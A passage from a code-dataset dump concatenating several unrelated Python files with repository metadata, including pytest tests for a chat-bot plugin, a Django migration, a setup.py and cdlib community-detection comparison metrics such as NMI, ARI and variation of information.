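# paths in lib/config resolve):
#
#   python download_stats.py                   # overall class / video counts
#   python download_stats.py --details         # per-class breakdown of found videos
#   python download_stats.py -s subset.json    # only count classes listed in subset.json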
| 31.108527
| 120
| 0.697982
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 963
| 0.23997
|
3be947a82f13de6d26fc798282d17c1307b2aaf7
| 257
|
py
|
Python
|
ex-mundo3/ex107/moeda.py
|
PedroPegado/ex-cursoemvideo
|
46751a7238e6a142b639c4cc3acf1759411732d7
|
[
"MIT"
] | null | null | null |
ex-mundo3/ex107/moeda.py
|
PedroPegado/ex-cursoemvideo
|
46751a7238e6a142b639c4cc3acf1759411732d7
|
[
"MIT"
] | null | null | null |
ex-mundo3/ex107/moeda.py
|
PedroPegado/ex-cursoemvideo
|
46751a7238e6a142b639c4cc3acf1759411732d7
|
[
"MIT"
] | null | null | null |
def aumentar(preco, taxa):
p = preco + (preco * taxa/100)
return p
def diminuir(preco, taxa):
p = preco - (preco * taxa/100)
return p
def dobro(preco):
p = preco * 2
return p
def metade(preco):
p = preco / 2
return p
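# Quick illustrative check of the helpers above (values are just examples):
if __name__ == '__main__':
    preco = 100.0
    print(aumentar(preco, 10))  # 110.0
    print(diminuir(preco, 10))  # 90.0
    print(dobro(preco))         # 200.0
    print(metade(preco))        # 50.0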
| 12.238095
| 34
| 0.564202
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3beac65b5cb6099092c07d4a94aab675261b906d
| 3,885
|
py
|
Python
|
e2e/test_accessbot_show_resources.py
|
arthurSena0704/accessbot
|
5097453c45c5193e6516bc1f9441e90e49b3d324
|
[
"Apache-2.0"
] | null | null | null |
e2e/test_accessbot_show_resources.py
|
arthurSena0704/accessbot
|
5097453c45c5193e6516bc1f9441e90e49b3d324
|
[
"Apache-2.0"
] | null | null | null |
e2e/test_accessbot_show_resources.py
|
arthurSena0704/accessbot
|
5097453c45c5193e6516bc1f9441e90e49b3d324
|
[
"Apache-2.0"
] | 3
|
2021-08-16T22:34:05.000Z
|
2021-09-22T02:51:13.000Z
|
# pylint: disable=invalid-name
import pytest
import sys
from unittest.mock import MagicMock
from test_common import create_config, DummyResource
sys.path.append('plugins/sdm')
from lib import ShowResourcesHelper
pytest_plugins = ["errbot.backends.test"]
extra_plugin_dir = 'plugins/sdm'
class Test_show_resources:
@pytest.fixture
def mocked_testbot(self, testbot):
config = create_config()
return inject_mocks(testbot, config)
def test_show_resources_command(self, mocked_testbot):
mocked_testbot.push_message("show available resources")
message = mocked_testbot.pop_message()
assert "Aaa (type: DummyResource)" in message
assert "Bbb (type: DummyResource)" in message
class Test_not_show_hidden_resources:
@pytest.fixture
def mocked_testbot_hide_resource_true(self, testbot):
config = create_config()
config['HIDE_RESOURCE_TAG'] = 'hide-resource'
resources = [ DummyResource("Bbb", {}), DummyResource("Aaa", {'hide-resource': True}) ]
return inject_mocks(testbot, config, resources)
@pytest.fixture
def mocked_testbot_hide_resource_false(self, testbot):
config = create_config()
config['HIDE_RESOURCE_TAG'] = 'hide-resource'
resources = [ DummyResource("Bbb", {}), DummyResource("Aaa", {'hide-resource': False}) ]
return inject_mocks(testbot, config, resources)
def test_show_resources_when_hide_resource_tag_true(self, mocked_testbot_hide_resource_true):
mocked_testbot_hide_resource_true.push_message("show available resources")
message = mocked_testbot_hide_resource_true.pop_message()
assert "Aaa (type: DummyResource)" not in message
assert "Bbb (type: DummyResource)" in message
def test_show_resources_when_hide_resource_tag_false(self, mocked_testbot_hide_resource_false):
mocked_testbot_hide_resource_false.push_message("show available resources")
message = mocked_testbot_hide_resource_false.pop_message()
assert "Aaa (type: DummyResource)" in message
assert "Bbb (type: DummyResource)" in message
class Test_show_resources_by_role:
@pytest.fixture
def mocked_testbot(self, testbot):
config = create_config()
config['CONTROL_RESOURCES_ROLE_NAME'] = 'myrole'
resources_by_role = [ DummyResource("Bbb in role", {}), DummyResource("Aaa in role", {}) ]
return inject_mocks(testbot, config, resources_by_role = resources_by_role)
def test_show_resources_command(self, mocked_testbot):
mocked_testbot.push_message("show available resources")
message = mocked_testbot.pop_message()
assert "Aaa in role (type: DummyResource)" in message
assert "Bbb in role (type: DummyResource)" in message
def default_dummy_resources():
return [ DummyResource("Bbb", {}), DummyResource("Aaa", {}) ]
# pylint: disable=dangerous-default-value
def inject_mocks(testbot, config, resources = default_dummy_resources(), resources_by_role = []):
accessbot = testbot.bot.plugin_manager.plugins['AccessBot']
accessbot.config = config
accessbot.get_admins = MagicMock(return_value = ["gbin@localhost"])
accessbot.get_api_access_key = MagicMock(return_value = "api-access_key")
accessbot.get_api_secret_key = MagicMock(return_value = "c2VjcmV0LWtleQ==") # valid base64 string
accessbot.get_sdm_service = MagicMock(return_value = create_sdm_service_mock(resources, resources_by_role))
accessbot.get_show_resources_helper = MagicMock(return_value = ShowResourcesHelper(accessbot))
return testbot
def create_sdm_service_mock(resources, resources_by_role):
service_mock = MagicMock()
service_mock.get_all_resources = MagicMock(return_value = resources)
service_mock.get_all_resources_by_role = MagicMock(return_value = resources_by_role)
return service_mock
| 45.174419
| 111
| 0.7426
| 2,497
| 0.642728
| 0
| 0
| 1,085
| 0.279279
| 0
| 0
| 728
| 0.187387
|
3beb73cbef34b508a909878716873d4472cedd74
| 64
|
py
|
Python
|
tftf/layers/activations/tanh.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 35
|
2018-08-11T05:01:41.000Z
|
2021-01-29T02:28:47.000Z
|
tftf/layers/activations/tanh.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | null | null | null |
tftf/layers/activations/tanh.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 4
|
2018-10-19T14:12:04.000Z
|
2021-01-29T02:28:49.000Z
|
import tensorflow as tf
def tanh(x):
return tf.nn.tanh(x)
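# Small illustrative check (assumes an eager-mode TensorFlow install; under
# graph mode this prints the symbolic tensor rather than the values):
if __name__ == '__main__':
    x = tf.constant([-1.0, 0.0, 1.0])
    print(tanh(x))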
| 10.666667
| 24
| 0.671875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3becb3cb8a9347c5c892e9c12331df179e27be0f
| 406
|
py
|
Python
|
game/migrations/0011_onlinegame_playersready.py
|
dimamelnik22/drawfulru
|
da2d21ef4c0b6776fc7c1059dbdf617f591c4ef8
|
[
"Apache-2.0"
] | null | null | null |
game/migrations/0011_onlinegame_playersready.py
|
dimamelnik22/drawfulru
|
da2d21ef4c0b6776fc7c1059dbdf617f591c4ef8
|
[
"Apache-2.0"
] | 7
|
2020-06-05T20:14:47.000Z
|
2021-09-22T18:18:06.000Z
|
game/migrations/0011_onlinegame_playersready.py
|
dimamelnik22/drawfulru
|
da2d21ef4c0b6776fc7c1059dbdf617f591c4ef8
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.0 on 2019-12-23 06:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('game', '0010_auto_20191223_0818'),
]
operations = [
migrations.AddField(
model_name='onlinegame',
name='playersready',
field=models.IntegerField(default=0),
),
]
| 21.368421
| 50
| 0.576355
| 309
| 0.761084
| 0
| 0
| 0
| 0
| 0
| 0
| 103
| 0.253695
|
3bed882365f0c947238e86347d95e522a56968a9
| 2,380
|
py
|
Python
|
deprecated.py
|
tungr/CoeusBot
|
90bdc869a1f8c077a1f88dcf1335d20a19d49fee
|
[
"MIT"
] | null | null | null |
deprecated.py
|
tungr/CoeusBot
|
90bdc869a1f8c077a1f88dcf1335d20a19d49fee
|
[
"MIT"
] | null | null | null |
deprecated.py
|
tungr/CoeusBot
|
90bdc869a1f8c077a1f88dcf1335d20a19d49fee
|
[
"MIT"
] | null | null | null |
#### Transfer data from JSON file to MongoDB ####
# @client.command()
# async def qupload(self, ctx):
# mclient = MongoClient(host="localhost", port=27017)
# db = mclient.coeusbot
# quotesdb = db.quotes
# with open('quotes.json', 'r') as f:
# quotes = json.load(f)
# for quotenum in range(1, len(quotes)):
# datetime = quotes[str(quotenum)]['date_time']
# author = quotes[str(quotenum)]['author']
# quote = quotes[str(quotenum)]['quote']
# guild = ctx.guild.id
# qamount = quotesdb.find({"guild": ctx.guild.id}) # Grab all quotes of same guild id
# qid = 1
# # Increment qid based on # of quotes in guild
# for qnum in qamount:
# qid += 1
# mquote = {
# "datetime": datetime,
# "author": author,
# "quote": quote,
# "guild": guild,
# "qid": qid
# }
# result = quotesdb.insert_one(mquote)
# mclient.close()
# await ctx.reply(f'Quotes transferred')
#### Add quote to JSON file ####
# @client.command(aliases=['qua'])
# async def quoteadd(self, ctx, *quote):
# with open('quotes.json', 'r') as f:
# quotes = json.load(f)
# if str(len(quotes)+1) not in quotes:
# now = dt.datetime.now()
# date_time = now.strftime("%m/%d/%Y, %I:%M%p")
# q_amount = len(quotes) + 1
# quotes[str(q_amount)] = {}
# quotes[str(q_amount)]['quote'] = quote
# quotes[str(q_amount)]['date_time'] = date_time
# quotes[str(q_amount)]['author'] = str(ctx.author)
# with open('quotes.json', 'w') as f:
# json.dump(quotes, f)
# await ctx.reply(f'Quote added')
#### Grab quote from JSON file ####
# @client.command()
# async def quotes(self, ctx):
# with open('quotes.json', 'r') as f:
# quotes = json.load(f)
# randquote = random.randint(1,len(quotes))
# quote = quotes[str(randquote)]['quote']
# date_time = quotes[str(randquote)]['date_time']
# author = quotes[str(randquote)]['author']
# quote_embed = discord.Embed(title=f'💬 Quote #{randquote}', color=0x03fcce)
# newquote = ' '.join(quote)
# quote_embed.add_field(name='\u200b', value=f'{newquote}', inline=False)
# quote_embed.set_footer(text=f'{date_time}')
# await ctx.send(embed=quote_embed)
| 32.162162
| 93
| 0.561765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,298
| 0.964331
|
3bedf4765622764f7282bd201ee9a488ae9fdbd2
| 370
|
py
|
Python
|
packaging/scripts/collect_matlab.py
|
robotraconteur/robotraconteur
|
ff997351761a687be364234684202e3348c4083c
|
[
"Apache-2.0"
] | 37
|
2019-01-31T06:05:17.000Z
|
2022-03-21T06:56:18.000Z
|
packaging/scripts/collect_matlab.py
|
robotraconteur/robotraconteur
|
ff997351761a687be364234684202e3348c4083c
|
[
"Apache-2.0"
] | 14
|
2019-07-18T04:09:45.000Z
|
2021-08-31T02:04:22.000Z
|
packaging/scripts/collect_matlab.py
|
robotraconteur/robotraconteur
|
ff997351761a687be364234684202e3348c4083c
|
[
"Apache-2.0"
] | 3
|
2018-11-23T22:03:22.000Z
|
2021-11-02T10:03:39.000Z
|
import shutil
import pathlib
asset_dirs = ["artifacts/main", "artifacts/build_python_version"]
pathlib.Path("distfiles").mkdir(exist_ok=True)
for asset_dir in asset_dirs:
for fname in list(pathlib.Path(asset_dir).glob('**/RobotRaconteur-*-MATLAB*')):
print(fname)
dest = pathlib.Path(fname)
shutil.copy(str(fname),"distfiles/" + dest.name)
| 30.833333
| 83
| 0.705405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 100
| 0.27027
|
3bee8a2e3ce8d0e0dbf5627d1dd4f2bc366b92ab
| 821
|
py
|
Python
|
setup.py
|
bryan-he/closek
|
b0367e09d7fa1a096580d762db6fd948e04c1d9e
|
[
"MIT"
] | null | null | null |
setup.py
|
bryan-he/closek
|
b0367e09d7fa1a096580d762db6fd948e04c1d9e
|
[
"MIT"
] | null | null | null |
setup.py
|
bryan-he/closek
|
b0367e09d7fa1a096580d762db6fd948e04c1d9e
|
[
"MIT"
] | null | null | null |
"""Metadata for package to allow installation with pip."""
import setuptools
exec(open("closek/version.py").read())
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="closek",
description="Scikit-learn-style implementation of the close-k classifier.",
long_description=long_description,
long_description_content_type="text/markdown",
author="Bryan He",
author_email="bryanhe@stanford.edu",
url="https://github.com/bryan-he/close-k",
version=__version__,
packages=setuptools.find_packages(),
install_requires=[
"torch",
"numpy",
"sklearn",
],
tests_require=[
"pmlb",
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
]
)
| 24.878788
| 79
| 0.6419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 351
| 0.427527
|
3beed423b84aed994aacbe9098f28892995cd210
| 491
|
py
|
Python
|
ramda/memoize_with_test.py
|
jakobkolb/ramda.py
|
982b2172f4bb95b9a5b09eff8077362d6f2f0920
|
[
"MIT"
] | 56
|
2018-08-06T08:44:58.000Z
|
2022-03-17T09:49:03.000Z
|
ramda/memoize_with_test.py
|
jakobkolb/ramda.py
|
982b2172f4bb95b9a5b09eff8077362d6f2f0920
|
[
"MIT"
] | 28
|
2019-06-17T11:09:52.000Z
|
2022-02-18T16:59:21.000Z
|
ramda/memoize_with_test.py
|
jakobkolb/ramda.py
|
982b2172f4bb95b9a5b09eff8077362d6f2f0920
|
[
"MIT"
] | 5
|
2019-09-18T09:24:38.000Z
|
2021-07-21T08:40:23.000Z
|
from ramda.memoize_with import memoize_with
from ramda.product import product
from ramda.private.asserts import assert_equal as e
count = 0
def memoize_with_test():
@memoize_with(lambda x: -x)
def factorial(n):
global count
count += 1
return product(range(1, n + 1))
e(factorial(5), 120)
e(factorial(5), 120)
e(factorial(5), 120)
e(factorial(4), 24)
e(factorial(4), 24)
e(factorial(4), 24)
e(factorial(4), 24)
e(count, 2)
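# For reference, a minimal sketch of the kind of key-based memoizer exercised above.
# This is hypothetical and NOT the ramda.py implementation (that lives in
# ramda.memoize_with); it only illustrates why `count` stays at 2: results are cached
# under key_fn(*args), so repeated calls with an equal key never re-run the body.
def _memoize_with_sketch(key_fn):
    def decorator(fn):
        cache = {}
        def wrapper(*args):
            key = key_fn(*args)
            if key not in cache:
                cache[key] = fn(*args)
            return cache[key]
        return wrapper
    return decorator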
| 20.458333
| 51
| 0.631365
| 0
| 0
| 0
| 0
| 129
| 0.262729
| 0
| 0
| 0
| 0
|
3beefe8b0cd9218be467b3453fa033b4d6ace79a
| 18,821
|
py
|
Python
|
cdlib/evaluation/comparison.py
|
xing-lab-pitt/cdlib
|
590e145429cda1db4d3671c994c502bedd77f108
|
[
"BSD-2-Clause"
] | 248
|
2019-02-17T05:31:22.000Z
|
2022-03-30T04:57:20.000Z
|
cdlib/evaluation/comparison.py
|
xing-lab-pitt/cdlib
|
590e145429cda1db4d3671c994c502bedd77f108
|
[
"BSD-2-Clause"
] | 130
|
2019-02-10T19:35:55.000Z
|
2022-03-31T10:58:39.000Z
|
cdlib/evaluation/comparison.py
|
xing-lab-pitt/cdlib
|
590e145429cda1db4d3671c994c502bedd77f108
|
[
"BSD-2-Clause"
] | 70
|
2019-02-15T19:04:29.000Z
|
2022-03-27T12:58:50.000Z
|
import numpy as np
from cdlib.evaluation.internal import onmi
from cdlib.evaluation.internal.omega import Omega
from nf1 import NF1
from collections import namedtuple, defaultdict
__all__ = [
"MatchingResult",
"normalized_mutual_information",
"overlapping_normalized_mutual_information_LFK",
"overlapping_normalized_mutual_information_MGH",
"omega",
"f1",
"nf1",
"adjusted_rand_index",
"adjusted_mutual_information",
"variation_of_information",
"partition_closeness_simple",
]
# MatchingResult = namedtuple("MatchingResult", ['mean', 'std'])
MatchingResult = namedtuple("MatchingResult", "score std")
MatchingResult.__new__.__defaults__ = (None,) * len(MatchingResult._fields)
def __check_partition_coverage(first_partition: object, second_partition: object):
nodes_first = {
node: None for community in first_partition.communities for node in community
}
nodes_second = {
node: None for community in second_partition.communities for node in community
}
if len(set(nodes_first.keys()) ^ set(nodes_second.keys())) != 0:
raise ValueError("Both partitions should cover the same node set")
def __check_partition_overlap(first_partition: object, second_partition: object):
if first_partition.overlap or second_partition.overlap:
raise ValueError("Not defined for overlapping partitions")
def normalized_mutual_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""
Normalized Mutual Information between two clusterings.
    Normalized Mutual Information (NMI) is a normalization of the Mutual
Information (MI) score to scale the results between 0 (no mutual
information) and 1 (perfect correlation). In this function, mutual
information is normalized by ``sqrt(H(labels_true) * H(labels_pred))``
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.normalized_mutual_information(louvain_communities,leiden_communities)
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import normalized_mutual_info_score
return MatchingResult(
score=normalized_mutual_info_score(first_partition_c, second_partition_c)
)
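# Hypothetical helper (not part of cdlib) showing, on a toy pair of partitions, the
# flattening used above: each clustering is turned into one label per node (sorted
# by node id) before being handed to scikit-learn. Names and toy data are illustrative.
def _toy_nmi_example():
    from sklearn.metrics import normalized_mutual_info_score
    first = [[0, 1, 2], [3, 4, 5]]  # two communities over nodes 0..5
    second = [[0, 1], [2, 3], [4, 5]]  # a finer partition of the same nodes
    def to_labels(communities):
        return [
            nid
            for _, nid in sorted(
                (node, nid)
                for nid, cluster in enumerate(communities)
                for node in cluster
            )
        ]
    return normalized_mutual_info_score(to_labels(first), to_labels(second))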
def overlapping_normalized_mutual_information_LFK(
first_partition: object, second_partition: object
) -> MatchingResult:
"""
Overlapping Normalized Mutual Information between two clusterings.
Extension of the Normalized Mutual Information (NMI) score to cope with overlapping partitions.
This is the version proposed by Lancichinetti et al. (1)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.overlapping_normalized_mutual_information_LFK(louvain_communities,leiden_communities)
:Reference:
1. Lancichinetti, A., Fortunato, S., & Kertesz, J. (2009). Detecting the overlapping and hierarchical community structure in complex networks. New Journal of Physics, 11(3), 033015.
"""
return MatchingResult(
score=onmi.onmi(
[set(x) for x in first_partition.communities],
[set(x) for x in second_partition.communities],
)
)
def overlapping_normalized_mutual_information_MGH(
first_partition: object, second_partition: object, normalization: str = "max"
) -> MatchingResult:
"""
Overlapping Normalized Mutual Information between two clusterings.
Extension of the Normalized Mutual Information (NMI) score to cope with overlapping partitions.
    This is the version proposed by McDaid et al., using a different normalization than the original LFK one. See ref.
for more details.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:param normalization: one of "max" or "LFK". Default "max" (corresponds to the main method described in the article)
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.overlapping_normalized_mutual_information_MGH(louvain_communities,leiden_communities)
:Reference:
    1. McDaid, A. F., Greene, D., & Hurley, N. (2011). Normalized mutual information to evaluate overlapping community finding algorithms. arXiv preprint arXiv:1110.2515.
"""
if normalization == "max":
variant = "MGH"
elif normalization == "LFK":
variant = "MGH_LFK"
else:
raise ValueError(
"Wrong 'normalization' value. Please specify one among [max, LFK]."
)
return MatchingResult(
score=onmi.onmi(
[set(x) for x in first_partition.communities],
[set(x) for x in second_partition.communities],
variant=variant,
)
)
def omega(first_partition: object, second_partition: object) -> MatchingResult:
"""
Index of resemblance for overlapping, complete coverage, network clusterings.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.omega(louvain_communities,leiden_communities)
:Reference:
    1. Gabriel Murray, Giuseppe Carenini, and Raymond Ng. 2012. `Using the omega index for evaluating abstractive community detection. <https://pdfs.semanticscholar.org/59d6/5d5aa09d789408fd9fd3c009a1b070ff5859.pdf/>`_ In Proceedings of Workshop on Evaluation Metrics and System Comparison for Automatic Summarization. Association for Computational Linguistics, Stroudsburg, PA, USA, 10-18.
"""
__check_partition_coverage(first_partition, second_partition)
first_partition = {k: v for k, v in enumerate(first_partition.communities)}
second_partition = {k: v for k, v in enumerate(second_partition.communities)}
om_idx = Omega(first_partition, second_partition)
return MatchingResult(score=om_idx.omega_score)
def f1(first_partition: object, second_partition: object) -> MatchingResult:
"""
    Compute the average F1 score of the optimal community matches among the input partitions.
Works on overlapping/non-overlapping complete/partial coverage partitions.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.f1(louvain_communities,leiden_communities)
:Reference:
    1. Rossetti, G., Pappalardo, L., & Rinzivillo, S. (2016). `A novel approach to evaluate community detection algorithms on ground truth. <https://www.researchgate.net/publication/287204505_A_novel_approach_to_evaluate_community_detection_algorithms_on_ground_truth/>`_ In Complex Networks VII (pp. 133-144). Springer, Cham.
"""
nf = NF1(first_partition.communities, second_partition.communities)
results = nf.summary()
return MatchingResult(
score=results["details"]["F1 mean"][0], std=results["details"]["F1 std"][0]
)
def nf1(first_partition: object, second_partition: object) -> MatchingResult:
"""
    Compute the Normalized F1 score of the optimal community matches among the input partitions.
Works on overlapping/non-overlapping complete/partial coverage partitions.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.nf1(louvain_communities,leiden_communities)
:Reference:
    1. Rossetti, G., Pappalardo, L., & Rinzivillo, S. (2016). `A novel approach to evaluate community detection algorithms on ground truth. <https://www.researchgate.net/publication/287204505_A_novel_approach_to_evaluate_community_detection_algorithms_on_ground_truth/>`_
    2. Rossetti, G. (2017). `RDyn: graph benchmark handling community dynamics. Journal of Complex Networks. <https://academic.oup.com/comnet/article-abstract/5/6/893/3925036?redirectedFrom=PDF/>`_ 5(6), 893-912.
"""
nf = NF1(first_partition.communities, second_partition.communities)
results = nf.summary()
return MatchingResult(score=results["scores"].loc["NF1"][0])
def adjusted_rand_index(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Rand index adjusted for chance.
The Rand Index computes a similarity measure between two clusterings
by considering all pairs of samples and counting pairs that are
assigned in the same or different clusters in the predicted and
true clusterings.
The raw RI score is then "adjusted for chance" into the ARI score
using the following scheme::
ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)
The adjusted Rand index is thus ensured to have a value close to
0.0 for random labeling independently of the number of clusters and
samples and exactly 1.0 when the clusterings are identical (up to
a permutation).
ARI is a symmetric measure::
adjusted_rand_index(a, b) == adjusted_rand_index(b, a)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.adjusted_rand_index(louvain_communities,leiden_communities)
:Reference:
1. Hubert, L., & Arabie, P. (1985). `Comparing partitions. <https://link.springer.com/article/10.1007/BF01908075/>`_ Journal of classification, 2(1), 193-218.
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import adjusted_rand_score
return MatchingResult(
score=adjusted_rand_score(first_partition_c, second_partition_c)
)
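# Tiny illustration of the chance adjustment described above (hypothetical; it calls
# scikit-learn directly on label vectors rather than on NodeClustering objects):
# an identical labeling scores exactly 1.0, while an unrelated random labeling
# lands near 0 and may even be slightly negative.
def _toy_ari_example(n=300, k=10, seed=0):
    from sklearn.metrics import adjusted_rand_score
    rng = np.random.RandomState(seed)
    labels = rng.randint(0, k, n)
    return adjusted_rand_score(labels, labels), adjusted_rand_score(
        labels, rng.randint(0, k, n)
    )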
def adjusted_mutual_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Adjusted Mutual Information between two clusterings.
Adjusted Mutual Information (AMI) is an adjustment of the Mutual
Information (MI) score to account for chance. It accounts for the fact that
the MI is generally higher for two clusterings with a larger number of
clusters, regardless of whether there is actually more information shared.
For two clusterings :math:`U` and :math:`V`, the AMI is given as::
AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [max(H(U), H(V)) - E(MI(U, V))]
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Be mindful that this function is an order of magnitude slower than other
metrics, such as the Adjusted Rand Index.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.adjusted_mutual_information(louvain_communities,leiden_communities)
:Reference:
1. Vinh, N. X., Epps, J., & Bailey, J. (2010). `Information theoretic measures for clusterings comparison: Variants, properties, normalization and correction for chance. <http://jmlr.csail.mit.edu/papers/volume11/vinh10a/vinh10a.pdf/>`_ Journal of Machine Learning Research, 11(Oct), 2837-2854.
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import adjusted_mutual_info_score
return MatchingResult(
score=adjusted_mutual_info_score(first_partition_c, second_partition_c)
)
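# Hypothetical companion to the docstring note above: with many clusters, the plain
# NMI of two *random* labelings drifts noticeably above 0, while AMI stays close to 0
# thanks to the correction for chance. Uses scikit-learn directly on label vectors.
def _ami_vs_nmi_on_random_labels(n=200, k=25, seed=0):
    from sklearn.metrics import adjusted_mutual_info_score, normalized_mutual_info_score
    rng = np.random.RandomState(seed)
    a, b = rng.randint(0, k, n), rng.randint(0, k, n)
    return normalized_mutual_info_score(a, b), adjusted_mutual_info_score(a, b)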
def variation_of_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Variation of Information among two nodes partitions.
$$ H(p)+H(q)-2MI(p, q) $$
    where MI is the mutual information, H the partition entropy, and p, q are the two community partitions being compared
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.variation_of_information(louvain_communities,leiden_communities)
:Reference:
1. Meila, M. (2007). `Comparing clusterings - an information based distance. <https://www.sciencedirect.com/science/article/pii/S0047259X06002016/>`_ Journal of Multivariate Analysis, 98, 873-895. doi:10.1016/j.jmva.2006.11.013
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
n = float(sum([len(c1) for c1 in first_partition.communities]))
sigma = 0.0
for c1 in first_partition.communities:
p = len(c1) / n
for c2 in second_partition.communities:
q = len(c2) / n
r = len(set(c1) & set(c2)) / n
if r > 0.0:
sigma += r * (np.log2(r / p) + np.log2(r / q))
return MatchingResult(score=abs(sigma))
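# Worked toy check (hypothetical): for the 4-node partitions {{0,1},{2,3}} and
# {{0,1,2,3}} we have H(p) = 1 bit, H(q) = 0 and MI = 0, so the variation of
# information defined above equals 1 bit. The helper recomputes that quantity from
# plain label lists, using bits to match the np.log2 used in the code above.
def _toy_variation_of_information():
    from sklearn.metrics import mutual_info_score
    def h_bits(labels):
        probs = np.array([labels.count(v) for v in set(labels)], dtype=float) / len(labels)
        return float(-(probs * np.log2(probs)).sum())
    p = [0, 0, 1, 1]
    q = [0, 0, 0, 0]
    mi_bits = mutual_info_score(p, q) / np.log(2)  # sklearn returns nats
    return h_bits(p) + h_bits(q) - 2 * mi_bits  # == 1.0 up to floating point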
def partition_closeness_simple(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Community size density closeness.
Simple implementation that does not leverage kernel density estimator.
    $$ S_G(A,B) = \frac{1}{2} \sum_{i=1}^{r}\sum_{j=1}^{s} \min\left(\frac{n^a(x^a_i)}{N^a}, \frac{n^b(x^b_j)}{N^b}\right) \delta(x_i^a,x_j^b) $$
where:
$$ N^a $$ total number of communities in A of any size;
$$ x^a $$ ordered list of community sizes for A;
$$ n^a $$ multiplicity of community sizes for A.
(symmetrically for B)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
